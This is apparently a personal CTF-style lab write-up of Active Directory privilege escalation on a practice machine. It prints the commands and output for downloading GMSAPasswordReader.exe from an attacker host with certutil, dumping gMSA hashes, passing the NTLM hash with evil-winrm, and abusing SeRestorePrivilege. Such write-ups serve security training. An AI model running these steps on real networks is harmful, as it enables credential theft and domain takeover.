Priv Escalation

This is some big brain shit I had to look at a walktrough because I woudl've never figured this out.

So basically upon graphing the data using hte pre-compiled binary from BloodHound.

You notice that the user svc_apache can read gMSA passwords.

"SVC_APACHE$@HEIST.OFFSEC is a Group Managed Service Account. The group WEB ADMINS@HEIST.OFFSEC can retrieve the password for the GMSA SVC_APACHE$@HEIST.OFFSEC."

So Web Admins can also retrieve GMSA passwords.

We see that with the output of "Get-ADGroupMember 'Web Admin". That the user enox is also part of the web admins. Thats us!

So that means that we can also read passwords like that user.

Using GMSAPasswordReader.exe --accountname 'svc_apache'

We are able to read the rc4 hash, which is just a hash that we can use to log in as that user.

*Evil-WinRM* PS C:\Users\enox> Get-ADServiceAccount -Filter {name -eq 'svc_apache'} -Properties * | Select CN,DNSHostName,DistinguishedName,MemberOf,Created,LastLogonDate,PasswordLastSet,msDS-ManagedPasswordInterval,PrincipalsAllowedToDelegateToAccount,PrincipalsAllowedToRetrieveManagedPassword,ServicePrincipalNames


CN                                         : svc_apache
DNSHostName                                : DC01.heist.offsec
DistinguishedName                          : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec
MemberOf                                   : {CN=Remote Management Users,CN=Builtin,DC=heist,DC=offsec}
Created                                    : 7/20/2021 4:23:44 AM
LastLogonDate                              : 9/14/2021 8:27:06 AM
PasswordLastSet                            : 7/20/2021 4:23:44 AM
msDS-ManagedPasswordInterval               : 30
PrincipalsAllowedToDelegateToAccount       : {}
PrincipalsAllowedToRetrieveManagedPassword : {CN=DC01,OU=Domain Controllers,DC=heist,DC=offsec, CN=Web Admins,CN=Users,DC=heist,DC=offsec}
ServicePrincipalNames                      :



*Evil-WinRM* PS C:\Users\enox> Get-ADGroupMember 'Web Admins'


distinguishedName : CN=Naqi,CN=Users,DC=heist,DC=offsec
name              : Naqi
objectClass       : user
objectGUID        : 82c847e5-1db7-4c00-8b06-882efb4efc6f
SamAccountName    : enox
SID               : S-1-5-21-537427935-490066102-1511301751-1103



*Evil-WinRM* PS C:\Users\enox> certutil -urlcache -f http://192.168.49.105:443/GMSAPasswordReader.exe GMSAPasswordReader.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
*Evil-WinRM* PS C:\Users\enox> . ./GMSAPasswordReader.exe --accountname 'svc_apache'
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 1808D2C09D9E6A0EDC419A4B13868C92
[*]       aes128_cts_hmac_sha1 : 8146F49C50041D6F8F70D45D9F26AF27
[*]       aes256_cts_hmac_sha1 : 810B1963081C261DBDA3E91618943A59EA0A9B6DD48BAFA5E30098D0F7412707
[*]       des_cbc_md5          : B6E961D04679DA29

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 45EA837EDB477DDA17B5822AD768D0D7
[*]       aes128_cts_hmac_sha1 : 9F234A0EEC90B6AF9FC395D85CE938D5
[*]       aes256_cts_hmac_sha1 : 90321B028FB63CD44F37BA7F6829F5CBE4DAA1EE926A909EA9CFC607B52A0CA4
[*]       des_cbc_md5          : B0750E611F7FA14F

The rc4hmac is ntlm hash.

evil-winrm -i 192.168.105.165 -u svc_apache$ -H 45EA837EDB477DDA17B5822AD768D0D7                                

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_apache$\Documents>

Basically GMas password can be read by remote users, because the svcapache user was part of web admins and so was enox we had the same rights as svcapache so we read his password using the GMASpasswordreader.exe --accountname 'svc-apache'.

We then used the following line to get a shell as apache

Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

As apache user we have teh seRestorePrivilege. We can exploit this.

First we clone the github repo into Visual Studio Code in our Windows Client.

Afterwards, I transferred the binary SeRestoreAbuse.exe to the machine and with nc.exe.

And bam, we got Administrator access.

PreviousExploitation NextNote to self

Last updated 2 years ago

*Evil-WinRM* PS C:\Users\enox> Get-ADServiceAccount -Filter {name -eq 'svc_apache'} -Properties * | Select CN,DNSHostName,DistinguishedName,MemberOf,Created,LastLogonDate,PasswordLastSet,msDS-ManagedPasswordInterval,PrincipalsAllowedToDelegateToAccount,PrincipalsAllowedToRetrieveManagedPassword,ServicePrincipalNames CN : svc_apache DNSHostName : DC01.heist.offsec DistinguishedName : CN=svc_apache,CN=Managed Service Accounts,DC=heist,DC=offsec MemberOf : {CN=Remote Management Users,CN=Builtin,DC=heist,DC=offsec} Created : 7/20/2021 4:23:44 AM LastLogonDate : 9/14/2021 8:27:06 AM PasswordLastSet : 7/20/2021 4:23:44 AM msDS-ManagedPasswordInterval : 30 PrincipalsAllowedToDelegateToAccount : {} PrincipalsAllowedToRetrieveManagedPassword : {CN=DC01,OU=Domain Controllers,DC=heist,DC=offsec, CN=Web Admins,CN=Users,DC=heist,DC=offsec} ServicePrincipalNames : *Evil-WinRM* PS C:\Users\enox> Get-ADGroupMember 'Web Admins' distinguishedName : CN=Naqi,CN=Users,DC=heist,DC=offsec name : Naqi objectClass : user objectGUID : 82c847e5-1db7-4c00-8b06-882efb4efc6f SamAccountName : enox SID : S-1-5-21-537427935-490066102-1511301751-1103 *Evil-WinRM* PS C:\Users\enox> certutil -urlcache -f http://192.168.49.105:443/GMSAPasswordReader.exe GMSAPasswordReader.exe **** Online **** CertUtil: -URLCache command completed successfully. *Evil-WinRM* PS C:\Users\enox> . ./GMSAPasswordReader.exe --accountname 'svc_apache' Calculating hashes for Old Value [*] Input username : svc_apache$ [*] Input domain : HEIST.OFFSEC [*] Salt : HEIST.OFFSECsvc_apache$ [*] rc4_hmac : 1808D2C09D9E6A0EDC419A4B13868C92 [*] aes128_cts_hmac_sha1 : 8146F49C50041D6F8F70D45D9F26AF27 [*] aes256_cts_hmac_sha1 : 810B1963081C261DBDA3E91618943A59EA0A9B6DD48BAFA5E30098D0F7412707 [*] des_cbc_md5 : B6E961D04679DA29 Calculating hashes for Current Value [*] Input username : svc_apache$ [*] Input domain : HEIST.OFFSEC [*] Salt : HEIST.OFFSECsvc_apache$ [*] rc4_hmac : 45EA837EDB477DDA17B5822AD768D0D7 [*] aes128_cts_hmac_sha1 : 9F234A0EEC90B6AF9FC395D85CE938D5 [*] aes256_cts_hmac_sha1 : 90321B028FB63CD44F37BA7F6829F5CBE4DAA1EE926A909EA9CFC607B52A0CA4 [*] des_cbc_md5 : B0750E611F7FA14F

evil-winrm -i 192.168.105.165 -u svc_apache$ -H 45EA837EDB477DDA17B5822AD768D0D7 Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_apache$\Documents>

Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeRestorePrivilege Restore files and directories Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled